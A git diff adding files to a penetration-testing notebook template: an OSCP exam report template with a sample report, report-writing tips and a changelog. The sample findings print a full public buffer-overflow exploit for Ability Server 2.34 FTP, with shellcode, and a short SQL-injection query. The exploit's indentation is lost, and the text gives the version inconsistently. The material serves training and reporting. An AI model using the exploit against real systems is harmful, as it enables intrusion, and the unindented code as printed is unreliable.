+
+<div style="page-break-after: always;"></div>
+
+
+# Additional Items
+
+## Appendix - Proof and Local Contents:
+
+IP (Hostname) | Local.txt Contents | Proof.txt Contents
+--------------|--------------------|-------------------
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+192.168.x.x   | hash_here          | hash_here
+
+## Appendix - Metasploit/Meterpreter Usage
+
+For the exam, I used my Metasploit/Meterpreter allowance on the following machine: `192.168.x.x`
+
+<br>
+
+<center>
+
+![310x310.png](../../../_resources/310x310.png) 
+
+</center>
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V2.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V2.md
new file mode 100644
index 0000000..5c7c7c9
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V2.md	
@@ -0,0 +1,459 @@
+# <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>
+
+![d2550626a1c94aeebd273d43be0669c9.png](../../../_resources/d2550626a1c94aeebd273d43be0669c9.png)
+
+## <div align="center">  student@emailaddress.com Student-ID </div>
+
+###### <div align="center"> 2023-XX-XX </div>
+
+
+<div style="page-break-after: always;"></div>
+
+
+# Offensive Security OSCP Exam Report
+
+## Introduction
+
+The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security course.
+This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam.
+The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
+
+## Objective
+
+The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network.
+The student is tasked with following methodical approach in obtaining access to the objective goals.
+This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
+An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
+Use the sample report as a guideline to get you through the reporting.
+
+## Requirements
+
+The student will be required to fill out this penetration testing report fully and to include the following sections:
+
+- Overall High-Level Summary and Recommendations (non-technical)
+- Methodology walkthrough and detailed outline of steps taken
+- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
+- Any additional items that were not included
+
+# High-Level Summary
+
+Alfred Simmons was tasked with performing an internal penetration test towards Offensive Security Labs.
+An internal penetration test is a dedicated attack against internally connected systems.
+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security's internal lab systems - the THINC.local domain.
+Alfred's overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security's network.
+When performing the attacks, Alfred was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, Alfred had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- Active Directory Set:
+  - HOSTNAME - Name of initial exploit
+  - HOSTNAME - Name of initial exploit
+  - HOSTNAME - Name of initial exploit
+- Standalone 1 - HOSTNAME - Name of initial exploit
+- Standalone 2 - HOSTNAME - Name of initial exploit
+- Standalone 3 - HOSTNAME - Name of initial exploit
+
+## Sample Report - Recommendations
+
+Alfred recommends patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+# Sample Report - Methodologies
+
+Alfred utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure.
+Below is a breakout of how Alfred was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Sample Report - Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, Alfred was tasked with exploiting the lab and exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136
+
+## Sample Report - Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+## Sample Report - Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, Alfred was able to successfully gain access to **X** out of the **X** systems.
+
+## Sample Report - Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+Alfred added administrator and root level accounts on all systems compromised.
+In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
+
+## Sample Report - House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After the trophies on the exam network were completed, Alfred removed all user accounts and passwords as well as the meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
+
+# Independent Challenges
+
+## Target #1 - 192.168.x.x
+
+### Service Enumeration
+
+**Port Scan Results**
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.1.1       | **TCP**: 21,22,25,80,443
+
+**FTP Enumeration**
+
+_Upon manual enumeration of the available FTP service, Alfred noticed it was running an outdated version 2.3.4 that is prone to the remote buffer overflow vulnerability._
+
+### Initial Access - Buffer Overflow
+
+**Vulnerability Explanation:** Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field.
+Attackers can use this vulnerability to cause arbitrary remote code execution and take completely control over the system.
+
+**Vulnerability Fix:** The publishers of the Ability Server have issued a patch to fix this known issue.
+It can be found here: http://www.code-crafters.com/abilityserver/
+
+**Severity:** Critical
+
+**Steps to reproduce the attack:** The operating system was different from the known public exploit.
+A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave Alfredfull administrative access over the system.
+
+**Proof of Concept Code Here:** Modifications to the existing exploit was needed and is highlighted in red.
+
+```python
+###################################
+# Ability Server 2.34 FTP STOR Buffer Overflow
+# Advanced, secure and easy to use FTP Server.
+# 21 Oct 2004 - muts
+###################################
+# D:\BO>ability-2.34-ftp-stor.py
+###################################
+# D:\data\tools>nc -v 127.0.0.1 4444
+# localhost [127.0.0.1] 4444 (?) open
+# Microsoft Windows XP [Version 5.1.2600]
+# (C) Copyright 1985-2001 Microsoft Corp.
+# D:\Program Files\abilitywebserver>
+###################################
+
+import ftplib
+from ftplib import FTP
+import struct
+print "\n\n################################"
+print "\nAbility Server 2.34 FTP STOR buffer Overflow"
+print "\nFor Educational Purposes Only!\n"
+print "###################################"
+
+# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"
+
+sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"
+sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"
+sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"
+sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"
+sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"
+sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"
+sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x66\x1c\xc2\x70"
+sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"
+sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"
+sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"
+sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"
+sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"
+sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"
+sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"
+sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"
+sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"
+sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"
+sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"
+sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"
+sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"
+sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"
+sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\xcc\xc2"
+# Change RET address if need be.
+buffer = '\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4
+#buffer = '\x41'*970+struct.pack('<L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2
+try:
+# Edit the IP, Username and Password.
+ftp = FTP('127.0.0.1')
+ftp.login('ftp','ftp')
+print "\nEvil Buffer sent..."
+print "\nTry connecting with netcat to port 4444 on the remote machine."
+except:
+print "\nCould not Connect to FTP Server."
+try:
+ftp.transfercmd("STOR " + buffer)
+except:
+print "\nDone."
+```
+
+**Proof Screenshot:**
+
+![ImgPlaceholder](img/placeholder-image-300x225.png)
+
+\newpage
+
+### Privilege Escalation - MySQL Injection
+
+**Vulnerability Explanation:** After establishing a foothold on target, Alfred noticed there were several applications running locally, one of them, a custom web application on port 80 was prone to SQL Injection attacks.
+Using Chisel for port forwarding, Alfred was able to access the web application.
+When performing the penetration test, Alfred noticed error-based MySQL Injection on the taxid query string parameter.
+While enumerating table data, Alfred was able to successfully extract the database root account login and password credentials that were unencrypted that also matched username and password accounts for the administrative user account on the system and Alfredwas able to log in remotely using RDP.
+This allowed for a successful breach of the operating system as well as all data contained on the system.
+
+**Vulnerability Fix:** Since this is a custom web application, a specific update will not properly solve this issue.
+The application will need to be programmed to properly sanitize user-input data, ensure that the user is running off of a limited user account, and that any sensitive data stored within the SQL database is properly encrypted.
+Custom error messages are highly recommended, as it becomes more challenging for the attacker to exploit a given weakness if errors are not being presented back to them.
+
+**Severity:** Critical
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code Here:**
+
+```sql
+SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"
+```
+
+### Post-Exploitation
+
+**System Proof Screenshot:**
+
+![ImgPlaceholder](img/placeholder-image-300x225.png)
+
+## Target #2 - 192.168.x.x
+
+### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.1.2       | **TCP**: 22,55,90,8080,80
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+### Initial Access - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+**Proof Screenshot:**
+
+**local.txt content:**
+
+### Privilege Escalation - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+### Post-Exploitation
+
+**Proof Screenshot:**
+
+**proof.txt content:**
+
+## Target #3 - 192.168.x.x
+
+### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.1.3       | **TCP**: 1433,3389\
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+### Initial Access - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+**Proof Screenshot:**
+
+**local.txt content:**
+
+### Privilege Escalation - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+### Post-Exploitation
+
+**Proof Screenshot:**
+
+**proof.txt content:**
+
+# Active Directory Set
+
+**Port Scan Results**
+
+IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 1433,3389\
+**UDP**: 1434,161
+192.168.x.x       | **TCP**: 1433,3389\
+**UDP**: 1434,161
+192.168.x.x       | **TCP**: 1433,3389\
+**UDP**: 1434,161
+
+## Hostname1: 192.168.x.x
+
+### Initial Access - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+**Proof Screenshot:**
+
+**local.txt content:**
+
+### Privilege Escalation - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+### Post-Exploitation
+
+**Proof Screenshot:**
+
+**proof.txt content:**
+
+## Hostname2: 192.168.x.x
+
+### Initial Access - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+**Proof Screenshot:**
+
+**local.txt content:**
+
+### Privilege Escalation - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+### Post-Exploitation
+
+**Proof Screenshot:**
+
+**proof.txt content:**
+
+## Hostname3: 192.168.x.x
+
+### Initial Access - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+
+**Proof Screenshot:**
+
+**local.txt content:**
+
+### Privilege Escalation - XXX
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Steps to reproduce the attack:**
+
+**Proof of Concept Code:**
+Please see Appendix 1 for the complete Windows Buffer Overflow code.
+
+### Post-Exploitation
+
+**Proof Screenshot:**
+
+**proof.txt content:**
+
+# Additional Items Not Mentioned in the Report
+
+This section is placed for any additional items that were not mentioned in the overall report.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/Tips for Writing a Report.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/Tips for Writing a Report.md
new file mode 100644
index 0000000..aa0f675
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/Tips for Writing a Report.md	
@@ -0,0 +1,22 @@
+1. Understand who is going to be reading this and who is the target audience?
+2. The report needs to clear that a non-technical person would understand 
+3. Report should include the following: 
+	1. Executive Summary
+	2. Technical Summary
+	3. Detail Report of findings
+	4. Include references from MITRE ATT&CK (https://attack.mitre.org/)
+	5. Recommendations for remediation (If possible)
+	
+
+
+
+Resources:
+
+- https://blog.zsec.uk/ltr101-pentest-reporting/
+- 
+
+Public Pentesting Reports: 
+
+- https://github.com/juliocesarfort/public-pentesting-reports
+- https://www.hackthebox.com/storage/press/samplereport/sample-penetration-testing-report-template.pdf
+- https://www.offsec.com/pwk-online/OSCP-Exam-Report.docx
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/General Information.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/General Information.md
new file mode 100644
index 0000000..a653b91
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/General Information.md	
@@ -0,0 +1,47 @@
+Created by TJ Null:
+
+Twitter: https://twitter.com/TJ_Null
+Github: https://github.com/tjnull
+
+Contribution: 
+
+If you would like to contribute to the template or provide suggestions, then you can submit an issue on the Github Repo here:
+- https://github.com/tjnull/TJ-JPT
+
+## Changelog:
+
+v1.0: Original Template
+
+v2.0 The first chapter
+
+2. Enumeration 
+- Added an FTP Notebook to include notes for that identified service
+- Added more content in Active Directory
+- Web has a subnotebook to include any content from the changelog.txt file
+- Fixed the gobuster oneliners to match with the recent changes from the tool
+
+3. Exploitation
+- Added some custom options for searchsploit
+
+4. Post Exploitation
+- Moved the subnotebook into a subnotebook (Target #1) so the user can copy the subnotebook and add another one under post exploitation for other targets. 
+- Created a sub notebook to include the output from automated priv esc scripts that are used.
+- Included tools, tips, and resources in all sections for priv esc
+
+v3.0 Major Refactoring Overhaul
+- Added sub notebooks (Recon Targets, Enumeration Targets, Exploitation Targets, Post Exploitation Targets). Makes it easier to organize all of the notes you have for assessing the targets instead of having them cluttered in your other notes.
+- Broke down the recon notes to include a discovery and a host scan sub notebooks
+- Moved Pivot/Tunneling into the Recon Notes Section. [Pivoting/Tunneling](../Pentest%20Template%20Master%203.0/1.%20Recon%20Notes/Pivoting_Tunneling.md)
+- Moved Reporting into High Value Information/Reporting SubNotebook 
+- New section for impacket ntlmrelayx [Impacket NtlmRelayX](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Impacket%20NtlmRelayX.md)
+- New section for pretender [Pretender](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Pretender.md)
+- New section or clean up with responder [Responder](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Responder.md)
+- New section including how to use villian [Villian Cheatsheet](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/Villian%20Cheatsheet.md)
+- New section for editable services [General Notes](../Pentest%20Template%20Master%203.0/7.%20Post%20Exploitation/Editable%20Services/General%20Notes.md)
+- Added a new PWK V2/V3 OSCP Report Template [OSCP Report Template V2](../Pentest%20Template%20Master%203.0/9.%20High%20Value%20Information_Reporting/Reporting/OSCP%20Report%20Template%20V2.md)
+- Added a PowerShell ISO oneliner if you want to launch your payloads through an ISO [General Notes](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/General%20Notes.md)
+
+
+Shoutout to TheGetch (https://github.com/TheGetch) for sharing some of his notes and giving me some inspiration to the hiearchy he has. 
+
+If you want to see his current methodolgy you can find it here: https://github.com/TheGetch/Penetration-Testing-Methodology
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/_resources/310x310.png b/Pentest_Template_Master_3.0/_resources/310x310.png
new file mode 100644
index 0000000..7ebd5b4
Binary files /dev/null and b/Pentest_Template_Master_3.0/_resources/310x310.png differ
diff --git a/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png b/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png
new file mode 100644
index 0000000..fa27c6c
Binary files /dev/null and b/Pentest_Template_Master_3.0/_resources/d2550626a1c94aeebd273d43be0669c9.png differ